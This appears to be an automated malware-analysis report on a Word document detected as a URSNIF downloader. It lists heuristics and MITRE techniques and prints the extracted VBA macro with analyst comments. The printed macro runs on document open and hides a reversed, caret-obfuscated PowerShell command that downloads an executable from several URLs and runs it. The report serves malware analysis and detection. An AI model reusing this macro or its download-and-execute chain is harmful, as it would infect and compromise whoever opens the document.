MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute commands. The script attempts to construct a command string that appears to be related to downloading and executing a payload. The ClamAV detection also points to a downloader family.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELL — Shell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPEN — Document_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body); this is the standard OOXML DrawingML schema namespace and is expected in Office documents.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5338 bytes |
| SHA-256: de3feba88e0c6f05e2b47616091019cb93fc6e75818520fe716a7f3f4f864566 | | | |
Preview script — first 1,000 lines of the extracted script
' Module header attributes as exported by olevba for the first module. VB_Base
' shows it derives from Normal.ThisDocument; the VB_Name value is a random-looking
' identifier rather than a descriptive module name.
Attribute VB_Name = "swzndmSFNX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: Document_Open runs when the document is opened
' (the OLE_VBA_DOCOPEN finding). Error handling is set to Resume Next, so any
' failing statement is skipped silently and execution still reaches the Shell call.
Private Sub Document_open()
' "On Error Resume Next" split across line continuations so the phrase never
' appears on a single source line.
On _
Error _
Resume _
Next
' Calls to Hour with constant string concatenations whose results are discarded;
' they appear to be filler around the single operative statement below.
Hour "Hi" + "SwB" + "PXV" + "419706368"
Hour "8024" + "368186678"
Hour "404636952" + "1548" + "69165687" + "2280"
Hour "4935" + "MnAfudEnAXlU" + "61784849" + "52819816"
Hour "450155142" + "vKbR" + "490964760" + "YNzfHzc"
' The operative statement (the OLE_VBA_SHELL finding): VBA.Shell runs a command
' string concatenated from CleanString(sOi) and several helper values. CPBOTpQ
' and iLVzvVowIoh are functions defined in the extracted source; sOi and the
' remaining names are not defined in the visible extract (other modules, or lost
' during extraction). The window-style argument 66 - 66 evaluates to 0, which is
' vbHide, so the spawned process runs without a visible window.
VBA.Shell CleanString(sOi) + DCkbiEPPRzoV + AJOtpBBjddjmFv + CPBOTpQ + iLVzvVowIoh + tpAPzSzN + wQTataLzddU + BVuzZWziUtJ, 66 - 66
' More discarded Hour calls after the Shell call.
Hour "YGvr" + "521002708" + "TwmAXBwCZ" + "QQMjzEcIlnjZVA"
Hour "Ejd" + "3588" + "QvwJDS" + "blXA"
Hour "d" + "5353" + "tNihftM" + "411713477"
Hour "Kv" + "CE" + "l" + "BFsBztBWw"
End Sub
' Header attribute of the second extracted module; again a random-looking name.
Attribute VB_Name = "smJcXmZq"
' Helper referenced from Document_open's Shell call. Returns the concatenation of
' five string fragments (sMawGHjXZwm, nBuZLjm, cRJbjrInH, maAuA, QuLvfoWf). The
' fragments are built from short literals, many containing caret (^) characters,
' plus one Chr() of an arithmetic sum in place of a literal character. The first
' fragment starts with a literal cmd /V prefix, consistent with the report's
' description of a command string assembled for download-and-execute. The
' interleaved Hour calls discard their results and appear to be filler.
Function CPBOTpQ()
' Errors are silently skipped, as in Document_open.
On _
Error _
Resume _
Next
Hour "YqAwDRt" + "MarU"
Hour "354710447" + "134464233" + "FLLOzPiT" + "pmwZPAt"
' Fragment 1: literal cmd /V prefix; Chr() of summed constants hides the inserted character.
sMawGHjXZwm = "cmd /V^" + ":O/C" + Chr(2 + 4 + 5 + 4 + 19) + "^se" + "^t ^F" + "ec^" + "Q"
Hour "9317" + "9982"
Hour "RL" + "UnLNM"
Hour "6125" + "EOPi"
Hour "XfS" + "IE"
' Fragment 2.
nBuZLjm = "=" + " ^ " + "^ ^ " + " ^" + " " + " ^ " + " }^}^" + "{^hc^"
Hour "GsdN" + "Lbrc" + "8314" + "5024"
Hour "uramBRiEkXhun" + "WjzMH" + "7637" + "4583"
' Fragment 3.
cRJbjrInH = "t" + "^ac^}^;" + "k^a^e" + "rb;SEZ" + "^$^ ^" + "m" + "^et^I-" + "^ekovnI" + ";)^S"
Hour "Hj" + "kz"
Hour "cX" + "7454"
Hour "9655" + "i"
Hour "EfO" + "aMZpZwqqzbii"
' Fragment 4.
maAuA = "^E^Z$ ," + "Bc" + "^j^$" + "(^e^l" + "i" + "^F" + "^d^aol" + "nwoD.^m" + "^"
Hour "m" + "3585"
Hour "TRSIvHzupEnqf" + "wR"
Hour "7415" + "3583" + "hSG" + "109474767"
' Fragment 5.
QuLvfoWf = "Tf${^y" + "r" + "t^{)j^j" + "^U$ ni" + "^ B" + "cj$(hc" + "^ae" + "r^" + "of^;^'e" + "xe^.^" + "'+" + "^d^i^l"
' Return value: the five fragments joined in order.
CPBOTpQ = sMawGHjXZwm + nBuZLjm + cRJbjrInH + maAuA + QuLvfoWf
Hour "DaS" + "187338800"
Hour "Y" + "wsRriw" + "7501" + "JMwXRQRpiImCHw"
End Function
Function iLVzvVowIoh()
On _
Error _
Resume _
Next
Hour "255713992" + "VqtVECtUQ"
Hour "wXJkOJH" + "3911"
VnOTZRf = "^$^+'\^" + "'" + "^+ci^lb" + "^" + "up^:vn" + "e^" + "$^" + "=SEZ^$" + ";^'^01" + "^3' ^" + "= ^d^i" + "l$^;)'^" + "@"
Hour "348209725" + "rf" + "OYOhBIh" + "J"
Hour "MHGQllMN" + "1362066"
OhGOvuVcpZ = "^'(" + "^t^i" + "^l^p^S" + ".'n" + "^2Sq4O/" + "n^i" + ".a" + "^h" + "^t" + "^k^a//:" + "ptt^" + "h@UK^t" + "^H"
Hour "Bp" + "LlPCTdX"
Hour "iF" + "OzqdimPGv"
Hour "4810" + "aHd"
rELvs = "X^u/^" + "m^oc.^e" + "cn^e" + "^g^i" + "ll" + "^" + "etni^d"
Hour "35245425" + "399682069" + "J" + "Bs"
Hour "9652" + "9340" + "2341" + "vDKi"
RiwasZCGj = "^e^tc^" + "enn^oc^" + "i" + "//^:p" + "^t^t^"
Hour "mbKM" + "6774928" + "bRzfTmirl" + "YHQTtLMYrz"
Hour "NUSYrVInbji" + "j" + "513862292" + "3062"
Hour "LOX" + "97631000"
Khoij = "h@" + "S^MYM^X" + "/sser" + "^p" + "^xe"
Hour "413285322" + "464981444" + "217323693" + "DTPdmDfM"
Hour "NjwG" + "YMjj" + "oiQ" + "4222"
Hour "352887817" + "PTkOam"
Hour "pbTAZuk" + "w" + "s" + "313450680"
LImzsn = "^." + "^ps" + "p//:p^t" + "t^h^@T" + "^D^In^i" + "/^m" + "oc.^"
Hour "R" + "nsj"
Hour "8990" + "507888983" + "349606627" + "MzmVDl"
Hour "YNTZ" + "JDKu"
VmsuHw = "shc^e^" + "to^fni^" + "kg^" + "." + "dlo/" + "/:^ptt" + "h" + "@^y" + "kJJ"
Hour "346125187" + "Cli" + "FmnWYinkY" + "n"
Hour "5079" + "8722"
Hour "oRQ" + "aDK"
Hour "uwU" + "31852554"
DUTWIXzZpJ = "^tQ/t" + "i.vo^" + "g^" + ".a" + "^s" + "^or^" + "a^mic" + "o" + "^ir" + "^o^t" + "avr" + "^" + "esnoc"
Hour "531384224" + "ME"
Hour "8125" + "C"
Hour "ZJLZWUO" + "7143" + "9895" + "FNawhpaI"
fILWJv = "//:^p" + "t^t" + "^h'=^" + "j^jU$^;" + "^tneilC" + "^beW.t" + "^e"
Hour "NpUGvu" + "AtiatE" + "34816936" + "SrLpUFIO"
Hour "8542" + "YJpGsNtJd" + "I" + "dI"
Hour "TULiUWVO" + "PSNN" + "p" + "ZiHqkbHSV"
CnsLP = "N tc^e" + "^jbo" + "^-^w^" + "en=^m" + "Tf^$
... (truncated)
|
|||